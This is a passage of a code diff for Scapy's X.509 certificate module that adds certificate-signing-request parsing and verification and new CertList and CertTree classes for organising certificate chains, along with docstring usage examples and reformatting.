scapy.layers.tls.cert import * + >>> cert = Cert("cert.der") + >>> k = PrivKeyRSA() # generate a private key + >>> cert.setSubjectPublicKeyFromPrivateKey(k) + >>> cert.resignWith(k) + >>> cert.export("newcert.pem") + >>> k.export("mykey.pem") One could also edit arguments like the serial number, as such:: - from scapy.layers.tls.cert import * - c = Cert("mycert.pem") - c.tbsCertificate.serialNumber = 0x4B1D - k = PrivKey("mykey.pem") # import an existing private key - c.resignWith(k) - c.export("newcert.pem") + >>> from scapy.layers.tls.cert import * + >>> c = Cert("mycert.pem") + >>> c.tbsCertificate.serialNumber = 0x4B1D + >>> k = PrivKey("mykey.pem") # import an existing private key + >>> c.resignWith(k) + >>> c.export("newcert.pem") To export the public key of a private key:: - k = PrivKey("mykey.pem") - k.pubkey.export("mypubkey.pem") + >>> k = PrivKey("mykey.pem") + >>> k.pubkey.export("mypubkey.pem") + +Example 2: CertList and CertTree +________________________________ + +Load a .pem file that contains multiple certificates:: + + >>> l = CertList("ca_chain.pem") + >>> l.show() + 0000 [X.509 Cert Subject:/C=FR/OU=Scapy Test PKI/CN=Scapy Test CA...] + 0001 [X.509 Cert Subject:/C=FR/OU=Scapy Test PKI/CN=Scapy Test Client...] + +Use 'CertTree' to organize the certificates in a tree:: + + >>> tree = CertTree("ca_chain.pem") # or tree = CertTree(l) + >>> tree.show() + /C=Ulaanbaatar/OU=Scapy Test PKI/CN=Scapy Test CA [Self Signed] + /C=FR/OU=Scapy Test PKI/CN=Scapy Test Client [Not Self Signed] + +Example 3: Certificate Signing Request (CSR) +____________________________________________ + +Scapy's :py:class:`~scapy.layers.tls.cert.CSR` class supports both PKCS#10 and CMC +formats. + +Load and display a CSR:: + + >>> csr = CSR("cert.req") + >>> csr + [CSR Format: CMC, Subject:/O=TestOrg/CN=TestCN, Verified: True] + >>> csr.certReq.show() + ###[ PKCS10_CertificationRequest ]### + \certificationRequestInfo\ + |###[ PKCS10_CertificationRequestInfo ]### + | version = 0x0 + | | | value = + [...] + +Get its public key and verify its signature:: + + >>> csr.pubkey + + >>> csr.verifySelf() + True No need for obnoxious openssl tweaking anymore. :) """ import base64 +import enum import os import time +import warnings from scapy.config import conf, crypto_validator +from scapy.compat import Self from scapy.error import warning from scapy.utils import binrepr -from scapy.asn1.asn1 import ASN1_BIT_STRING +from scapy.asn1.asn1 import ( + ASN1_BIT_STRING, + ASN1_NULL, + ASN1_OID, + ASN1_STRING, +) from scapy.asn1.mib import hash_by_oid +from scapy.packet import Packet from scapy.layers.x509 import ( + CMS_CertificateChoices, + CMS_ContentInfo, + CMS_EncapsulatedContentInfo, + CMS_IssuerAndSerialNumber, + CMS_RevocationInfoChoice, + CMS_SignedAttrsForSignature, + CMS_SignedData, + CMS_SignerInfo, + CMS_SubjectKeyIdentifier, ECDSAPrivateKey_OpenSSL, ECDSAPrivateKey, ECDSAPublicKey, - EdDSAPublicKey, EdDSAPrivateKey, + EdDSAPublicKey, + PKCS10_CertificationRequest, RSAPrivateKey_OpenSSL, RSAPrivateKey, RSAPublicKey, + X509_AlgorithmIdentifier, + X509_Attribute, + X509_AttributeValue, X509_Cert, X509_CRL, X509_SubjectPublicKeyInfo, ) -from scapy.layers.tls.crypto.pkcs1 import pkcs_os2ip, _get_hash, \ - _EncryptAndVerifyRSA, _DecryptAndSignRSA -from scapy.compat import raw, bytes_encode +from scapy.layers.tls.crypto.pkcs1 import ( + _DecryptAndSignRSA, + _EncryptAndVerifyRSA, + _get_hash, + pkcs_os2ip, +) +from scapy.compat import bytes_encode + +# Typing imports +from typing import ( + List, + Optional, + Union, +) if conf.crypto_valid: from cryptography.exceptions import InvalidSignature from cryptography.hazmat.backends import default_backend + from cryptography.hazmat.primitives import hashes from cryptography.hazmat.primitives import serialization from cryptography.hazmat.primitives.asymmetric import rsa, ec, x25519 @@ -89,21 +176,23 @@ # loading huge file when importing a cert _MAX_KEY_SIZE = 50 * 1024 _MAX_CERT_SIZE = 50 * 1024 -_MAX_CRL_SIZE = 10 * 1024 * 1024 # some are that big +_MAX_CRL_SIZE = 10 * 1024 * 1024 # some are that big +_MAX_CSR_SIZE = 50 * 1024 ##################################################################### # Some helpers ##################################################################### + @conf.commands.register def der2pem(der_string, obj="UNKNOWN"): """Convert DER octet string to PEM format (with optional header)""" # Encode a byte string in PEM format. Header advertises type. pem_string = "-----BEGIN %s-----\n" % obj base64_string = base64.b64encode(der_string).decode() - chunks = [base64_string[i:i + 64] for i in range(0, len(base64_string), 64)] # noqa: E501 - pem_string += '\n'.join(chunks) + chunks = [base64_string[i : i + 64] for i in range(0, len(base64_string), 64)] + pem_string += "\n".join(chunks) pem_string += "\n-----END %s-----\n" % obj return pem_string @@ -164,7 +253,7 @@ def __call__(cls, obj_path, obj_max_size, pem_marker=None): raise Exception(error_msg) obj_path = bytes_encode(obj_path) - if (b'\x00' not in obj_path) and os.path.isfile(obj_path): + if (b"\x00" not in obj_path) and os.path.isfile(obj_path): _size = os.path.getsize(obj_path) if _size > obj_max_size: raise Exception(error_msg) @@ -181,7 +270,7 @@ def __call__(cls, obj_path, obj_max_size, pem_marker=None): frmt = "PEM" pem = _raw der_list = split_pem(pem) - der = b''.join(map(pem2der, der_list)) + der = b"".join(map(pem2der, der_list)) else: frmt = "DER" der = _raw @@ -200,12 +289,14 @@ def __call__(cls, obj_path, obj_max_size, pem_marker=None): # Public Keys # ############### + class _PubKeyFactory(_PKIObjMaker): """ Metaclass for PubKey creation. It casts the appropriate class on the fly, then fills in the appropriate attributes with import_from_asn1pkt() submethod. """ + def __call__(cls, key_path=None, cryptography_obj=None): # This allows to import cryptography objects directly if cryptography_obj is not None: @@ -275,12 +366,18 @@ class PubKey(metaclass=_PubKeyFactory): """ def verifyCert(self, cert): - """ Verifies either a Cert or an X509_Cert. """ + """Verifies either a Cert or an X509_Cert.""" + h = _get_cert_sig_hashname(cert) tbsCert = cert.tbsCertificate - sigAlg = tbsCert.signature - h = hash_by_oid[sigAlg.algorithm.val] - sigVal = raw(cert.signatureValue) - return self.verify(raw(tbsCert), sigVal, h=h, t='pkcs') + sigVal = bytes(cert.signatureValue) + return self.verify(bytes(tbsCert), sigVal, h=h, t="pkcs") + + def verifyCsr(self, csr): + """Verifies a CSR.""" + h = _get_csr_sig_hashname(csr) + certReqInfo = csr.certReq.certificationRequestInfo + sigVal = bytes(csr.certReq.signature) + return self.verify(bytes(certReqInfo), sigVal, h=h, t="pkcs") @property def pem(self): @@ -315,12 +412,20 @@ def export(self, filename, fmt=None): elif fmt == "PEM": return f.write(self.pem.encode()) + @crypto_validator + def verify(self, msg, sig, h="sha256", **kwargs): + """ + Verify signed data. + """ + raise NotImplementedError + class PubKeyRSA(PubKey, _EncryptAndVerifyRSA): """ Wrapper for RSA keys based on _EncryptAndVerifyRSA from crypto/pkcs1.py Use the 'key' attribute to access original object. """ + @crypto_validator def fill_and_store(self, modulus=None, modulusLen=None, pubExp=None): pubExp = pubExp or 65537 @@ -374,8 +479,7 @@ def encrypt(self, msg, t="pkcs", h="sha256", mgf=None, L=None): return _EncryptAndVerifyRSA.encrypt(self, msg, t=t, h=h, mgf=mgf, L=L) def verify(self, msg, sig, t="pkcs", h="sha256", mgf=None, L=None): - return _EncryptAndVerifyRSA.verify( - self, msg, sig, t=t, h=h, mgf=mgf, L=L) + return _EncryptAndVerifyRSA.verify(self, msg, sig, t=t, h=h, mgf=mgf, L=L) class PubKeyECDSA(PubKey): @@ -383,6 +487,7 @@ class PubKeyECDSA(PubKey): Wrapper for ECDSA keys based on the cryptography library. Use the 'key' attribute to access original object. """ + @crypto_validator def fill_and_store(self, curve=None): curve = curve or ec.SECP256R1 @@ -415,6 +520,7 @@ class PubKeyEdDSA(PubKey): Wrapper for EdDSA keys based on the cryptography library. Use the 'key' attribute to access original object. """ + @crypto_validator def fill_and_store(self, curve=None): curve = curve or x25519.X25519PrivateKey @@ -445,12 +551,14 @@ def verify(self, msg, sig, **kwargs): # Private Keys # ################ + class _PrivKeyFactory(_PKIObjMaker): """ Metaclass for PrivKey creation. It casts the appropriate class on the fly, then fills in the appropriate attributes with import_from_asn1pkt() submethod. """ + def __call__(cls, key_path=None, cryptography_obj=None): """ key_path may be the path to either: @@ -472,11 +580,14 @@ def __call__(cls, key_path=None, cryptography_obj=None): if cryptography_obj is not None: # We (stupidly) need to go through the whole import process because RSA # does more than just importing the cryptography objects... - obj = _PKIObj("DER", cryptography_obj.private_bytes( - encoding=serialization.Encoding.DER, - format=serialization.PrivateFormat.PKCS8, - encryption_algorithm=serialization.NoEncryption() - )) + obj = _PKIObj( + "DER", + cryptography_obj.private_bytes( + encoding=serialization.Encoding.DER, + format=serialization.PrivateFormat.PKCS8, + encryption_algorithm=serialization.NoEncryption(), + ), + ) else: # Load from file obj = _PKIObjMaker.__call__(cls, key_path, _MAX_KEY_SIZE) @@ -518,8 +629,10 @@ def __call__(cls, key_path=None, cryptography_obj=None): class _Raw_ASN1_BIT_STRING(ASN1_BIT_STRING): """A ASN1_BIT_STRING that ignores BER encoding""" + def __bytes__(self): return self.val_readable + __str__ = __bytes__ @@ -546,7 +659,7 @@ def signTBSCert(self, tbsCert, h="sha256"): """ sigAlg = tbsCert.signature h = h or hash_by_oid[sigAlg.algorithm.val] - sigVal = self.sign(raw(tbsCert), h=h, t='pkcs') + sigVal = self.sign(bytes(tbsCert), h=h, t="pkcs") c = X509_Cert() c.tbsCertificate = tbsCert c.signatureAlgorithm = sigAlg @@ -554,16 +667,16 @@ def signTBSCert(self, tbsCert, h="sha256"): return c def resignCert(self, cert): - """ Rewrite the signature of either a Cert or an X509_Cert. """ + """Rewrite the signature of either a Cert or an X509_Cert.""" return self.signTBSCert(cert.tbsCertificate, h=None) def verifyCert(self, cert): - """ Verifies either a Cert or an X509_Cert. """ - tbsCert = cert.tbsCertificate - sigAlg = tbsCert.signature - h = hash_by_oid[sigAlg.algorithm.val] - sigVal = raw(cert.signatureValue) - return self.verify(raw(tbsCert), sigVal, h=h, t='pkcs') + """Verifies either a Cert or an X509_Cert.""" + return self.pubkey.verifyCert(cert) + + def verifyCsr(self, cert): + """Verifies either a CSR.""" + return self.pubkey.verifyCsr(cert) @property def pem(self): @@ -574,7 +687,7 @@ def der(self): return self.key.private_bytes( encoding=serialization.Encoding.DER, format=serialization.PrivateFormat.PKCS8, - encryption_algorithm=serialization.NoEncryption() + encryption_algorithm=serialization.NoEncryption(), ) def export(self, filename, fmt=None): @@ -592,19 +705,50 @@ def export(self, filename, fmt=None): elif fmt == "PEM": return f.write(self.pem.encode()) + @crypto_validator + def sign(self, data, h="sha256", **kwargs): + """ + Sign data. + """ + raise NotImplementedError + + @crypto_validator + def verify(self, msg, sig, h="sha256", **kwargs): + """ + Verify signed data. + """ + raise NotImplementedError + class PrivKeyRSA(PrivKey, _DecryptAndSignRSA): """ Wrapper for RSA keys based on _DecryptAndSignRSA from crypto/pkcs1.py Use the 'key' attribute to access original object. """ + @crypto_validator - def fill_and_store(self, modulus=None, modulusLen=None, pubExp=None, - prime1=None, prime2=None, coefficient=None, - exponent1=None, exponent2=None, privExp=None): + def fill_and_store( + self, + modulus=None, + modulusLen=None, + pubExp=None, + prime1=None, + prime2=None, + coefficient=None, + exponent1=None, + exponent2=None, + privExp=None, + ): pubExp = pubExp or 65537 - if None in [modulus, prime1, prime2, coefficient, privExp, - exponent1, exponent2]: + if None in [ + modulus, + prime1, + prime2, + coefficient, + privExp, + exponent1, + exponent2, + ]: # note that the library requires every parameter # in order to call RSAPrivateNumbers(...) # if one of these is missing, we generate a whole new key @@ -627,10 +771,15 @@ def fill_and_store(self, modulus=None, modulusLen=None, pubExp=None, if modulusLen and real_modulusLen != modulusLen: warning("modulus and modulusLen do not match!") pubNum = rsa.RSAPublicNumbers(n=modulus, e=pubExp) - privNum = rsa.RSAPrivateNumbers(p=prime1, q=prime2, - dmp1=exponent1, dmq1=exponent2, - iqmp=coefficient, d=privExp, - public_numbers=pubNum) + privNum = rsa.RSAPrivateNumbers( + p=prime1, + q=prime2, + dmp1=exponent1, + dmq1=exponent2, + iqmp=coefficient, + d=privExp, + public_numbers=pubNum, + ) self.key = privNum.private_key(default_backend()) pubkey = self.key.public_key() @@ -653,10 +802,16 @@ def import_from_asn1pkt(self, privkey): exponent1 = privkey.exponent1.val exponent2 = privkey.exponent2.val coefficient = privkey.coefficient.val - self.fill_and_store(modulus=modulus, pubExp=pubExp, - privExp=privExp, prime1=prime1, prime2=prime2, - exponent1=exponent1, exponent2=exponent2, - coefficient=coefficient) + self.fill_and_store( + modulus=modulus, + pubExp=pubExp, + privExp=privExp, + prime1=prime1, + prime2=prime2, + exponent1=exponent1, + exponent2=exponent2, + coefficient=coefficient, + ) def verify(self, msg, sig, t="pkcs", h="sha256", mgf=None, L=None): return self.pubkey.verify( @@ -677,6 +832,7 @@ class PrivKeyECDSA(PrivKey): Wrapper for ECDSA keys based on SigningKey from ecdsa library. Use the 'key' attribute to access original object. """ + @crypto_validator def fill_and_store(self, curve=None): curve = curve or ec.SECP256R1 @@ -686,8 +842,9 @@ def fill_and_store(self, curve=None): @crypto_validator def import_from_asn1pkt(self, privkey): - self.key = serialization.load_der_private_key(raw(privkey), None, - backend=default_backend()) # noqa: E501 + self.key = serialization.load_der_private_key( + bytes(privkey), None, backend=default_backend() + ) self.pubkey = PubKeyECDSA(cryptography_obj=self.key.public_key()) self.marker = "EC PRIVATE KEY" @@ -705,6 +862,7 @@ class PrivKeyEdDSA(PrivKey): Wrapper for EdDSA keys Use the 'key' attribute to access original object. """ + @crypto_validator def fill_and_store(self, curve=None): curve = curve or x25519.X25519PrivateKey @@ -714,8 +872,9 @@ def fill_and_store(self, curve=None): @crypto_validator def import_from_asn1pkt(self, privkey): - self.key = serialization.load_der_private_key(raw(privkey), None, - backend=default_backend()) # noqa: E501 + self.key = serialization.load_der_private_key( + bytes(privkey), None, backend=default_backend() + ) self.pubkey = PubKeyECDSA(cryptography_obj=self.key.public_key()) self.marker = "PRIVATE KEY" @@ -732,21 +891,25 @@ def sign(self, data, **kwargs): # Certificates # ################ + class _CertMaker(_PKIObjMaker): """ Metaclass for Cert creation. It is not necessary as it was for the keys, but we reuse the model instead of creating redundant constructors. """ + def __call__(cls, cert_path=None, cryptography_obj=None): # This allows to import cryptography objects directly if cryptography_obj is not None: - obj = _PKIObj("DER", cryptography_obj.public_bytes( - encoding=serialization.Encoding.DER, - )) + obj = _PKIObj( + "DER", + cryptography_obj.public_bytes( + encoding=serialization.Encoding.DER, + ), + ) else: # Load from file - obj = _PKIObjMaker.__call__(cls, cert_path, - _MAX_CERT_SIZE, "CERTIFICATE") + obj = _PKIObjMaker.__call__(cls, cert_path, _MAX_CERT_SIZE, "CERTIFICATE") obj.__class__ = Cert obj.marker = "CERTIFICATE" try: @@ -759,6 +922,24 @@ def __call__(cls, cert_path=None, cryptography_obj=None): return obj +def _get_cert_sig_hashname(cert): + """ + Return the hash associated with the signature algorithm of a certificate. + """ + tbsCert = cert.tbsCertificate + sigAlg = tbsCert.signature + return hash_by_oid[sigAlg.algorithm.val] + + +def _get_csr_sig_hashname(csr): + """ + Return the hash associated with the signature algorithm of a CSR. + """ + certReq = csr.certReq + sigAlg = certReq.signatureAlgorithm + return hash_by_oid[sigAlg.algorithm.val] + + class Cert(metaclass=_CertMaker): """ Wrapper for the X509_Cert from layers/x509.py. @@ -771,7 +952,6 @@ def import_from_asn1pkt(self, cert): self.x509Cert = cert tbsCert = cert.tbsCertificate - self.tbsCertificate = tbsCert if tbsCert.version: self.version = tbsCert.version.val + 1 @@ -801,7 +981,7 @@ def import_from_asn1pkt(self, cert): raise Exception(error_msg) self.notAfter_str_simple = time.strftime("%x", self.notAfter) - self.pubKey = PubKey(raw(tbsCert.subjectPublicKeyInfo)) + self.pubkey = PubKey(bytes(tbsCert.subjectPublicKeyInfo)) if tbsCert.extensions: for extn in tbsCert.extensions: @@ -816,10 +996,10 @@ def import_from_asn1pkt(self, cert): elif extn.extnID.oidname == "authorityKeyIdentifier": self.authorityKeyID = extn.extnValue.keyIdentifier.val - self.signatureValue = raw(cert.signatureValue) + self.signatureValue = bytes(cert.signatureValue) self.signatureLen = len(self.signatureValue) - def isIssuerCert(self, other): + def isIssuer(self, other): """ True if 'other' issued 'self', i.e.: - self.issuer == other.subject @@ -827,7 +1007,10 @@ def isIssuerCert(self, other): """ if self.issuer_hash != other.subject_hash: return False - return other.pubKey.verifyCert(self) + return other.pubkey.verifyCert(self) + + def isIssuerCert(self, other): + return self.isIssuer(other) def isSelfSigned(self): """ @@ -836,24 +1019,21 @@ def isSelfSigned(self): - the signature of the certificate is valid. """ if self.issuer_hash == self.subject_hash: - return self.isIssuerCert(self) + return self.isIssuer(self) return False def encrypt(self, msg, t="pkcs", h="sha256", mgf=None, L=None): # no ECDSA *encryption* support, hence only RSA specific keywords here - return self.pubKey.encrypt(msg, t=t, h=h, mgf=mgf, L=L) + return self.pubkey.encrypt(msg, t=t, h=h, mgf=mgf, L=L) def verify(self, msg, sig, t="pkcs", h="sha256", mgf=None, L=None): - return self.pubKey.verify(msg, sig, t=t, h=h, mgf=mgf, L=L) + return self.pubkey.verify(msg, sig, t=t, h=h, mgf=mgf, L=L) def getSignatureHash(self): """ - Return the hash used by the 'signatureAlgorithm' + Return the hash cryptography object used by the 'signatureAlgorithm' """ - tbsCert = self.tbsCertificate - sigAlg = tbsCert.signature - h = hash_by_oid[sigAlg.algorithm.val] - return _get_hash(h) + return _get_hash(_get_cert_sig_hashname(self)) def setSubjectPublicKeyFromPrivateKey(self, key): """ @@ -901,17 +1081,17 @@ def remainingDays(self, now=None): now = time.localtime() elif isinstance(now, str): try: - if '/' in now: - now = time.strptime(now, '%m/%d/%y') + if "/" in now: + now = time.strptime(now, "%m/%d/%y") else: - now = time.strptime(now, '%b %d %H:%M:%S %Y %Z') + now = time.strptime(now, "%b %d %H:%M:%S %Y %Z") except Exception: - warning("Bad time string provided, will use localtime() instead.") # noqa: E501 + warning("Bad time string provided, will use localtime() instead.") now = time.localtime() now = time.mktime(now) nft = time.mktime(self.notAfter) - diff = (nft - now) / (24. * 3600) + diff = (nft - now) / (24.0 * 3600) return diff def isRevoked(self, crl_list): @@ -931,14 +1111,20 @@ def isRevoked(self, crl_list): Cert. Otherwise, the issuers are simply compared. """ for c in crl_list: - if (self.authorityKeyID is not None and - c.authorityKeyID is not None and - self.authorityKeyID == c.authorityKeyID): + if ( + self.authorityKeyID is not None + and c.authorityKeyID is not None + and self.authorityKeyID == c.authorityKeyID + ): return self.serial in (x[0] for x in c.revoked_cert_serials) elif self.issuer == c.issuer: return self.serial in (x[0] for x in c.revoked_cert_serials) return False + @property + def tbsCertificate(self): + return self.x509Cert.tbsCertificate + @property def pem(self): return der2pem(self.der, self.marker) @@ -947,6 +1133,21 @@ def pem(self): def der(self): return bytes(self.x509Cert) + @property + def pubKey(self): + warnings.warn( + "Cert.pubKey is deprecated and will be removed in a future version. " + "Use Cert.pubkey", + DeprecationWarning, + ) + return self.pubkey + + def __eq__(self, other): + return self.der == other.der + + def __hash__(self): + return hash(self.der) + def export(self, filename, fmt=None): """ Export certificate in 'fmt' format (DER or PEM) to file 'filename' @@ -969,18 +1170,23 @@ def show(self): print("Validity: %s to %s" % (self.notBefore_str, self.notAfter_str)) def __repr__(self): - return "[X.509 Cert. Subject:%s, Issuer:%s]" % (self.subject_str, self.issuer_str) # noqa: E501 + return "[X.509 Cert. Subject:%s, Issuer:%s]" % ( + self.subject_str, + self.issuer_str, + ) ################################ # Certificate Revocation Lists # ################################ + class _CRLMaker(_PKIObjMaker): """ Metaclass for CRL creation. It is not necessary as it was for the keys, but we reuse the model instead of creating redundant constructors. """ + def __call__(cls, cert_path): obj = _PKIObjMaker.__call__(cls, cert_path, _MAX_CRL_SIZE, "X509 CRL") obj.__class__ = CRL @@ -1004,7 +1210,7 @@ def import_from_asn1pkt(self, crl): self.x509CRL = crl tbsCertList = crl.tbsCertList - self.tbsCertList = raw(tbsCertList) + self.tbsCertList = bytes(tbsCertList) if tbsCertList.version: self.version = tbsCertList.version.val + 1 @@ -1057,18 +1263,18 @@ def import_from_asn1pkt(self, crl): revoked.append((serial, date)) self.revoked_cert_serials = revoked - self.signatureValue = raw(crl.signatureValue) + self.signatureValue = bytes(crl.signatureValue) self.signatureLen = len(self.signatureValue) - def isIssuerCert(self, other): + def isIssuer(self, other): # This is exactly the same thing as in Cert method. if self.issuer_hash != other.subject_hash: return False - return other.pubKey.verifyCert(self) + return other.pubkey.verifyCert(self) def verify(self, anchors): # Return True iff the CRL is signed by one of the provided anchors. - return any(self.isIssuerCert(a) for a in anchors) + return any(self.isIssuer(a) for a in anchors) def show(self): print("Version: %d" % self.version) @@ -1078,140 +1284,632 @@ def show(self): print("nextUpdate: %s" % self.nextUpdate_str) +############################### +# Certificate Signing Request # +############################### + + +class _CSRMaker(_PKIObjMaker): + """ + Metaclass for CSR creation. It is not necessary as it was for the keys, + but we reuse the model instead of creating redundant constructors. + """ + + def __call__(cls, cert_path): + obj = _PKIObjMaker.__call__(cls, cert_path, _MAX_CSR_SIZE) + obj.__class__ = CSR + try: + # PKCS#10 format + csr = PKCS10_CertificationRequest(obj._der) + obj.marker = "NEW CERTIFICATE REQUEST" + obj.fmt = CSR.FORMAT.PKCS10 + except Exception: + try: + # CMC format + csr = CMS_ContentInfo(obj._der) + obj.marker = "NEW CERTIFICATE REQUEST" + obj.fmt = CSR.FORMAT.CMC + except Exception: + raise Exception("Unable to import CSR") + + obj.import_from_asn1pkt(csr) + return obj + + +class CSR(metaclass=_CSRMaker): + """ + Wrapper for the CSR formats. + This can handle both PKCS#10 and CMC formats. + """ + + class FORMAT(enum.Enum): + """ + The format used by the CSR. + """ + + PKCS10 = "PKCS#10" + CMC = "CMC" + + def import_from_asn1pkt(self, csr): + self.csr = csr + certReqInfo = self.certReq.certificationRequestInfo + + # Subject + self.subject = certReqInfo.get_subject() + self.subject_str = certReqInfo.get_subject_str() + self.subject_hash = hash(self.subject_str) + + # pubkey + self.pubkey = PubKey(bytes(certReqInfo.subjectPublicKeyInfo)) + + # Get the "subjectKeyIdentifier" from the "extensionRequest" attribute + try: + extReq = next( + x.values[0].value + for x in certReqInfo.attributes + if x.type.val == "1.2.840.113549.1.9.14" # extKeyUsage + ) + self.sid = next( + x.extnValue.keyIdentifier + for x in extReq.extensions + if x.extnID.val == "2.5.29.14" # subjectKeyIdentifier + ) + except StopIteration: + self.sid = None + + @property + def certReq(self): + csr = self.csr + + if self.fmt == CSR.FORMAT.PKCS10: + return csr + elif self.fmt == CSR.FORMAT.CMC: + if ( + csr.contentType.oidname != "id-signedData" + or csr.content.encapContentInfo.eContentType.oidname != "id-cct-PKIData" + ): + raise ValueError("Invalid CMC wrapping !") + req = csr.content.encapContentInfo.eContent.reqSequence[0] + return req.request.certificationRequest + else: + raise ValueError("Invalid CSR format !") + + @property + def pem(self): + return der2pem(self.der, self.marker) + + @property + def der(self): + return bytes(self.csr) + + def __eq__(self, other): + return self.der == other.der + + def __hash__(self): + return hash(self.der) + + def isIssuer(self, other): + return other.sid == self.sid + + def isSelfSigned(self): + return True + + def verify(self, msg, sig, t="pkcs", h="sha256", mgf=None, L=None): + return self.pubkey.verify(msg, sig, t=t, h=h, mgf=mgf, L=L) + + def export(self, filename, fmt=None): + """ + Export certificate in 'fmt' format (DER or PEM) to file 'filename' + """ + if fmt is None: + if filename.endswith(".pem"): + fmt = "PEM" + else: + fmt = "DER" + with open(filename, "wb") as f: + if fmt == "DER": + return f.write(self.der) + elif fmt == "PEM": + return f.write(self.pem.encode()) + + def show(self): + certReqInfo = self.certReq.certificationRequestInfo + + print("Subject: " + self.subject_str) + print("Attributes:") + for attr in certReqInfo.attributes: + print(" - %s" % attr.type.oidname) + + def verifySelf(self) -> bool: + """ + Verify the signatures of the CSR + """ + if self.fmt == self.FORMAT.CMC: + try: + cms_engine = CMS_Engine([self]) + cms_engine.verify(self.csr) + return self.pubkey.verifyCsr(self) + except ValueError: + return False + elif self.fmt == self.FORMAT.PKCS10: + return self.pubkey.verifyCsr(self) + else: + return False + + def __repr__(self): + return "[CSR Format: %s, Subject:%s, Verified: %s]" % ( + self.fmt.value, + self.subject_str, + self.verifySelf(), + ) + + +#################### +# Certificate list # +#################### + + +class CertList(list): + """ + An object that can store a list of Cert objects, load them and export them + into DER/PEM format. + """ + + def __init__( + self, + certList: Union[Self, List[Cert], List[CSR], Cert, str], + ): + """ + Construct a list of certificates/CRLs to be used as list of ROOT certificates. + """ + # Parse the certificate list / CA + if isinstance(certList, str): + # It's a path. First get the _PKIObj + obj = _PKIObjMaker.__call__( + CertList, certList, _MAX_CERT_SIZE, "CERTIFICATE" + ) + + # Then parse the der until there's nothing left + certList = [] + payload = obj._der + while payload: + cert = X509_Cert(payload) + if conf.raw_layer in cert.payload: + payload = cert.payload.load + else: + payload = None + cert.remove_payload() + certList.append(Cert(cert)) + + self.frmt = obj.frmt + elif isinstance(certList, Cert): + certList = [certList] + self.frmt = "PEM" + else: + self.frmt = "PEM" + + super(CertList, self).__init__(certList) + + def findCertBySid(self, sid): + """ + Find a certificate in the list by SubjectIDentifier. + """ + for cert in self: + if isinstance(cert, Cert) and isinstance(sid, CMS_IssuerAndSerialNumber): + if cert.issuer == sid.get_issuer(): + return cert + elif isinstance(cert, CSR) and isinstance(sid, CMS_SubjectKeyIdentifier): + if cert.sid == sid.sid: + return cert + raise KeyError("Certificate not found !") + + def export(self, filename, fmt=None): + """ + Export a list of certificates 'fmt' format (DER or PEM) to file 'filename' + """ + if fmt is None: + if filename.endswith(".pem"): + fmt = "PEM" + else: + fmt = "DER" + with open(filename, "wb") as f: + if fmt == "DER": + return f.write(self.der) + elif fmt == "PEM": + return f.write(self.pem.encode()) + + @property + def der(self): + return b"".join(x.der for x in self) + + @property + def pem(self): + return "".join(x.pem for x in self) + + def __repr__(self): + return "" % (len(self),) + + def show(self): + for i, c in enumerate(self): + print(conf.color_theme.id(i, fmt="%04i"), end=" ") + print(repr(c)) + + ###################### # Certificate chains # ###################### -class Chain(list): + +class CertTree(CertList): """ - Basically, an enhanced array of Cert. + An extension to CertList that additionally has a list of ROOT CAs + that are trusted. + + Example:: + + >>> tree = CertTree("ca_chain.pem") + >>> tree.show() + /CN=DOMAIN-DC1-CA/dc=DOMAIN [Self Signed] + /CN=Administrator/dc=DOMAIN [Not Self Signed] """ - def __init__(self, certList, cert0=None): + __slots__ = ["frmt", "rootCAs"] + + def __init__( + self, + certList: Union[List[Cert], CertList, str], + rootCAs: Union[List[Cert], CertList, Cert, str, None] = None, + ): """ - Construct a chain of certificates starting with a self-signed - certificate (or any certificate submitted by the user) - and following issuer/subject matching and signature validity. - If there is exactly one chain to be constructed, it will be, - but if there are multiple potential chains, there is no guarantee - that the retained one will be the longest one. - As Cert and CRL classes both share an isIssuerCert() method, - the trailing element of a Chain may alternatively be a CRL. + Construct a chain of certificates that follows issuer/subject matching and + respects signature validity. Note that we do not check AKID/{SKID/issuer/serial} matching, nor the presence of keyCertSign in keyUsage extension (if present). + + :param certList: a list of Cert/CRL objects (or path to PEM/DER file containing + multiple certs/CRL) to try to chain. + :param rootCAs: (optional) a list of certificates to trust. If not provided, + trusts any self-signed certificates from the certList. """ - list.__init__(self, ()) - if cert0: - self.append(cert0) + # Parse the certificate list + certList = CertList(certList) + + # Find the ROOT CAs if store isn't specified + if not rootCAs: + # Build cert store. + self.rootCAs = CertList([x for x in certList if x.isSelfSigned()]) + # And remove those certs from the list + for cert in self.rootCAs: + certList.remove(cert) else: - for root_candidate in certList: - if root_candidate.isSelfSigned(): - self.append(root_candidate) - certList.remove(root_candidate) - break - - if len(self) > 0: - while certList: - tmp_len = len(self) - for c in certList: - if c.isIssuerCert(self[-1]): - self.append(c) - certList.remove(c) - break - if len(self) == tmp_len: - # no new certificate appended to self - break - - def verifyChain(self, anchors, untrusted=None): + # Store cert store. + self.rootCAs = CertList(rootCAs) + # And remove those certs from the list if present (remove dups) + for cert in self.rootCAs: + if cert in certList: + certList.remove(cert) + + # Append our root CAs to the certList + certList.extend(self.rootCAs) + + # Super instantiate + super(CertTree, self).__init__(certList) + + @property + def tree(self): """ - Perform verification of certificate chains for that certificate. - A list of anchors is required. The certificates in the optional - untrusted list may be used as additional elements to the final chain. - On par with chain instantiation, only one chain constructed with the - untrusted candidates will be retained. Eventually, dates are checked. + Get a tree-like object of the certificate list """ - untrusted = untrusted or [] - for a in anchors: - chain = Chain(self + untrusted, a) - if len(chain) == 1: # anchor only - continue - # check that the chain does not exclusively rely on untrusted - if any(c in chain[1:] for c in self): - for c in chain: - if c.remainingDays() < 0: - break - if c is chain[-1]: # we got to the end of the chain - return chain - return None - - def verifyChainFromCAFile(self, cafile, untrusted_file=None): + # We store the tree object as a dictionary that contains children. + tree = [(x, []) for x in self.rootCAs] + + # We'll empty this list eventually + certList = list(self) + + # We make a list of certificates we have to search children for, and iterate + # through it until it's empty. + todo = list(tree) + + # Iterate + while todo: + cert, children = todo.pop() + for c in certList: + # Check if this certificate matches the one we're looking at + if c.isIssuer(cert) and c != cert: + item = (c, []) + children.append(item) + certList.remove(c) + todo.append(item) + + return tree + + def getchain(self, cert): """ - Does the same job as .verifyChain() but using the list of anchors - from the cafile. As for .verifyChain(), a list of untrusted - certificates can be passed (as a file, this time). + Return a chain of certificate that points from a ROOT CA to a certificate. """ - try: - with open(cafile, "rb") as f: - ca_certs = f.read() - except Exception: - raise Exception("Could not read from cafile") - anchors = [Cert(c) for c in split_pem(ca_certs)] + def _rec_getchain(chain, curtree): + # See if an element of the current tree signs the cert, if so add it to + # the chain, else recurse. + for c, subtree in curtree: + curchain = chain + [c] + # If 'cert' is issued by c + if 